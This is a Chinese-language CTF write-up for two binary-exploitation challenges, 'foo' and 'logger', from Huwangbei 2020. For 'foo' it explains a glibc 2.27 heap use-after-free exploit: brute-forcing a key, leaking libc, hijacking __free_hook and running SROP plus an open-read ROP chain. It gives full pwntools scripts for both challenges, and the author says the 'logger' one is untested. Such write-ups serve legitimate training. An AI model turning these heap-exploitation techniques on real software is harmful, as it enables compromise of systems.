护网杯_2020

护网杯线上WP,更新了一下 附件

foo

题目是一个菜单堆,因为有一个随机值作为key,所以不好操作,漏洞点是UAF,2.27的环境

1. 首先清空所有的0x40块,因为可以一直覆盖同一个Index,所以配合edit,一字节一字节的爆破,最多256*4次,即可拿到随机值key
2. 继续申请并释放一定量的0x40的块填满TCache 以及 放几个chunk到fastbin,利用scanf("%ld')让块进入smallbin
3. case5的gift将smallbin中的这个块给切割出来,同时切割一个剩下的在unsorted bin中的chunk,用show打印libc出来
4. 因为malloc(0x180)的块是由之前UAF的块组合的,所以在这里面布置好key值,即可绕过key值检测从而攻击到free_hook并利用malloc(0x180)的块构造SROP
1
from pwn import*
2
context.log_level ='DEBUG'
3
context.arch = 'AMD64'
4
def menu(ch):
5
	p.sendlineafter('Your choice: ',str(ch))
6
def new(index):
7
	menu(1)
8
	p.sendlineafter('Index:',str(index))
9
def edit(index,content):
10
	menu(2)
11
	p.sendlineafter('Index:',str(index))
12
	p.sendafter('Content:',content)
13
def show(index):
14
	menu(3)
15
	p.sendlineafter('Index:',str(index))
16
def free(index):
17
	menu(4)
18
	p.sendlineafter('Index:',str(index))
19
def gift(content):
20
	menu(5)
21
	p.sendafter('cookie?',content)
22
p = process('./main')
23
libc =ELF('./libc-2.27.so')
24
for i in range(12):
25
	new(0)
26
def bf(key):
27
	try:
28
		new(0)
29
		edit(0,'\x00'*0x28 + key)
30
		menu(2)
31
		p.sendlineafter('Index:','0')
32
		data = p.recvuntil('Content:',timeout=0.05)
33
		if 'Content' in data:
34
			return True
35
	except:
36
		return False
37
key = ''
38
for n in range(4):
39
	for i in range(256):
40
		tmp = key + chr(i)
41
		if bf(tmp):
42
			key += chr(i)
43
			p.sendline('FMYY')
44
			break
45
		else:
46
			continue
47
log.info('Key:\t' + key)
48
for i in range(15):
49
	new(i + 1)
50
for i in range(7):
51
	free(15 - i)
52
for i in range(8):
53
	free(15 - 7 - i)
54
menu('0'*0x500)
55
56
gift(('\x00'*0x28 + key + p32(0) +  p64(0) + p64(0x41))*5)
57
#gdb.attach(p,"set *$rebase(0x202028)=0xDEADBEEF")
58
59
for i in range(7):
60
	new(i + 9)
61
62
new(0)
63
show(0)
64
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] -0x70
65
log.info('LIBC:\t' + hex(libc_base))
66
free(2)
67
gift(('\x00'*0x28 + key + p32(0) + p64(0) + p64(0x41))*5)
68
free(2)
69
new(0)
70
edit(0,p64(libc_base + libc.sym['__free_hook']))
71
new(0)
72
new(0)
73
edit(0,p64(libc_base + libc.sym['setcontext'] + 53))
74
#########################################3
75
free_hook = libc_base + libc.sym['__free_hook']
76
Open = libc_base + libc.symbols["open"]
77
Read = libc_base + libc.symbols["read"]
78
Puts = libc_base + libc.symbols['puts']
79
syscall = libc_base + libc.sym['syscall']
80
pop_rdi_ret = libc_base + 0x000000000002155F
81
pop_rdx_ret = libc_base + 0x0000000000001B96
82
pop_rsi_ret = libc_base + 0x0000000000023E8A
83
pop_rax_ret = libc_base + 0x0000000000043A78
84
frame = SigreturnFrame()
85
frame.rax = 0
86
frame.rdi = 0
87
frame.rsi = free_hook
88
frame.rdx = 0x2000
89
frame.rsp = free_hook
90
frame.rip = Read
91
92
orw  = p64(pop_rax_ret) + p64(2)
93
orw += p64(pop_rdi_ret)+p64(free_hook + 0xF8)
94
orw += p64(pop_rsi_ret)+p64(0)
95
orw += p64(syscall + 23)
96
orw += p64(pop_rdi_ret) + p64(3)
97
orw += p64(pop_rdx_ret) + p64(0x30)
98
orw += p64(pop_rsi_ret) + p64(free_hook+0x100)
99
orw += p64(Read)
100
orw += p64(pop_rdi_ret)+p64(free_hook+0x100)
101
orw += p64(Puts)
102
orw  = orw.ljust(0xF8,'\x00')
103
orw += './flag\x00\x00'
104
###################################
105
gift(str(frame))
106
sleep(0.2)
107
p.sendline(orw)
108
p.interactive()

logger

一开始有点没看懂,后面发现有个任意写,没环境,libxml2.so.2 和 libicuuc.so.63弄了好久没弄好,真够烦人的,lib都不给全,然后看了下Nu1L公布的WP把步骤补全了,不清楚能否打通

1
from pwn import*
2
context.log_level = 'DEBUG'
3
def menu(ch):
4
	p.sendlineafter('Exit',str(ch))
5
def leak(content):
6
	menu(1)
7
	p.sendafter('Content:',content)
8
def write(idx,content):
9
	menu(2)
10
	p.sendafter('Content:',content)
11
	p.sendlineafter('ID',str(idx))
12
def exit(content):
13
	menu(3)
14
	p.sendafter('Content:',content)
15
def edit(offset,content):
16
	for i in range(len(content)):
17
		tmp = ord(content[i])
18
		if tmp:
19
			write(offset + i,'U'*tmp)
20
		else:
21
			write(offset + i,'U'*0x100)
22
p = process('./main')
23
elf =ELF('./main')
24
libc =ELF('./libc-2.30.so')
25
edit(-6032,p64(elf.got['__libc_start_main']))
26
leak('FMYY')
27
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__libc_start_main']
28
log.info('LIBC:\t' + hex(libc_base))
29
30
edit(0xD8,p64(0x67F8B0))
31
edit(0x88,p64(elf.bss() + 0x1000))
32
edit(0x100 + 0x38 ,p64(libc_base + 0xF1207))
33
edit(-16,p64(0x67F7B0))
34
menu(4)
35
p.interactive()
Contents
  1. 1. foo
  2. 2. logger
|